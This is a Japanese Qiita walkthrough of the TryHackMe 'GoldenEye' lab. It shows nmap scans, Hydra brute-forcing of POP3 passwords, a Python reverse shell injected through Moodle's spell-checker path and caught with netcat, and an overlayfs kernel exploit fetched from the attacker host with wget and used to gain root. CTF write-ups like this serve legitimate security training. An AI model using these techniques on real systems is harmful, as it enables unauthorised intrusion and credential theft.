Go to Qiita Advent Calendar 2024 Top
LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

@kk0128

【TryHackMe】GoldenEye:Walkthrough

Posted at

概要

TryHackMe「GoldenEye」ルームのWalkthroughです。

Task1

Q2.Use nmap to scan the network for all ports. How many ports are open?

Hint.nmap -p- -Pn

ポートスキャンを実行します。

$ nmap -Pn -T4 -sV -A -sC -p- 10.10.79.54 -oN nmap_result
PORT      STATE    SERVICE  VERSION
25/tcp    open     smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp    open     http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
55006/tcp open     ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE SASL(PLAIN) USER UIDL TOP PIPELINING CAPA
55007/tcp open     pop3     Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE STLS PIPELINING USER UIDL SASL(PLAIN) TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time

ポートの稼働状況が分かりました。

ポート サービス バージョン
25 smtp Postfix smtpd
80 http Apache httpd 2.4.7
55006 ssl/pop3 Dovecot pop3d
55007 pop3 Dovecot pop3d

A.4

Q4.Who needs to make sure they update their default password?

80番ポートにアクセスします。

index.jpg

ソースコードからterminal.jsを発見しました。

var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//
(省略)

Borisアカウントとエンコードされたパスワードを得られました。

A.boris

Q5.Whats their password?

文字列をデコードするとパスワードを得られました。

pas.jpg

得られた認証情報で/sev-home/にログインします。

login.jpg

ソースコードからNatalya Borisがわかりました。

natalua.jpg

A.InvincibleHack3r

Task2

Q2.If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?

Hint.pop3

pop3に得た認証情報でログインを試みましたが、失敗しました。

$ nc -nv 10.10.79.54 55007                               
(UNKNOWN) [10.10.79.54] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.

borisアカウントのパスワードをブルートフォースで探します。

$ hydra -f -l boris -P /usr/share/wordlists/fasttrack.txt 10.10.79.54 pop3 -s 55007
[55007][pop3] host: 10.10.79.54   login: boris   password: secret1!

A.secret1!

Q3.Inspect port 55007, what services is configured to use this port?

A.telnet

Q5.What can you find on this service?

A.emails

Q6.What user can break Boris' codes?

パスワードが判明したのでPOP3にログインします。

$ nc -nv 10.10.79.54 55007                                                     
(UNKNOWN) [10.10.79.54] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.

保存されている3つのメールを確認します。

list
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

メール2の内容からnatalyaだと分かりました。

A.natalya

Q7.Using the users you found on this service, find other users passwords

メールの内容からnatalya,root,alec,Xeniaアカウントを確認できました。

それぞれブルートフォースでパスワードを探します。

$ hydra -f -l natalya -P /usr/share/wordlists/fasttrack.txt 10.10.79.54 pop3 -s 55007
[55007][pop3] host: 10.10.79.54   login: natalya   password: bird

natalyaのパスワードがわかりました。

Q8.Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

Hint.You will eventually get a xenia's password in plaintext.

POP3にログインしメールを確認します。

$ nc -nv 10.10.79.54 55007
(UNKNOWN) [10.10.79.54] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

メールの内容からUsername: xenia,Password: RCP90rulez!がわかりました。

Task3

Q3.Try using the credentials you found earlier. Which user can you login as?

natalyaのメールからsevernaya-station.comドメインが分かったので/etc/hostsに追記します。

10.10.157.156   severnaya-station.com

severnaya-station.com/gnocertdirにアクセスします。

domain access.jpg

判明しているxeniaアカウントでログインに成功しました。

xenia login.jpg

A.xenia

Q4.Have a poke around the site. What other user can you find?

Dr Doakアカウントからメッセージが来ており、他のユーザーを確認できました。

doak.jpg

A.doak

Q5.What was this users password?

Hint.pop3 + hydra

POP3にもdoakアカウントがあるかもしれません。
ブルートフォースでパスワードを特定します。

$ hydra -f -l doak -P /usr/share/wordlists/fasttrack.txt 10.10.157.156 pop3 -s 55007
[55007][pop3] host: 10.10.157.156   login: doak   password: goat

A.goat

Q7.What is the next user you can find from doak?

Hint.Emails, emails, emails..

パスワードが判明したのでPOP3にログインします。

$ nc -nv 10.10.157.156 55007
(UNKNOWN) [10.10.157.156] 55007 (?) open
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.

メールの内容から認証情報を得られました。

list
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

A.dr_doak

Q8.What is this users password?

A.4England!

Q9.Take a look at their files on the moodle (severnaya-station.com)

見つけた認証情報を利用してsevernaya-station.comにログインします。

Home->My profile->My private filesからs3cret.txtファイルを発見しました。

priv file.jpg

s3cret.txt
007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

画像ファイルのパスを得たのでhttp://severnaya-station.com/dir007key/for-007.jpgをダウンロードします。

$ wget http://severnaya-station.com/dir007key/for-007.jpg

ダウンロードしたファイルのメタ情報を見るとBase64でエンコードされた文字列を発見しました。

$ exiftool for-007.jpg
(省略)
Image Description               : eFdpbnRlcjE5OTV4IQ==

元の文字列が分かりました。

$ echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d             
xWinter1995x!

Username: admin,Password: xWinter1995x!でログインに成功しました。

admin login.jpg

spellを検索します。
Spell enginePSpellShellに変更し、Path to aspellにpythonのリバースシェルコードを入力し保存します。

spell check.jpg

Netcatでリッスンします。

$ nc -lvnp 1234             
listening on [any] 1234 ...

Home->My profile->Blogs->Add a new entryに移動し、スペルチェックボタンをクリックします。

spell check.jpg

リバースシェルを張れました。

$ nc -lvnp 1234             
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.157.156] 59716
$ whoami
whoami
www-data

Task4

Q2.Whats the kernel version?

Hint.uname -a

linpeasを実行するとカーネルのバージョンに脆弱性があると分かりました。

$ ./linpeas.sh

(省略)
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                              
                               ╚═══════════════════╝                                                             
OS: Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) )

A.3.13.0-32-generic

Q5.What is the root flag?

Linux Kernel3.13.0-32-genericの脆弱性を検索すると下記PoCが見つかりました。

Kaliでofs.cを作成し、ターゲットマシンにダウンロードします。

$ wget http://10.6.55.144/ofs.c

gccでコンパイルを試みましたがインストールされていないようです。

$ gcc ofs.c -o ofs
gcc ofs.c -o ofs
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

ccでコンパイルします。

$ cc ofs.c -o ofs
cc ofs.c -o ofs
ofs.c:61:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
ofs.c:73:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
ofs.c:78:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
ofs.c:84:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
ofs.c:94:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.

プロムラムを実行しましたが、エラーが出て権限昇格に失敗しました。

$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library

ofs.cのコードをgccからccに編集します。

lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

再度PoCをダウンロード、コンパイルし実行すると権限昇格に成功しました。

$ ./ofs  
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root

/root/.flag.txtからルートフラグを入手できます。

/root/.flag.txt
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

flag.jpg

A.568628e0d993b1973adc718237da6e93

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?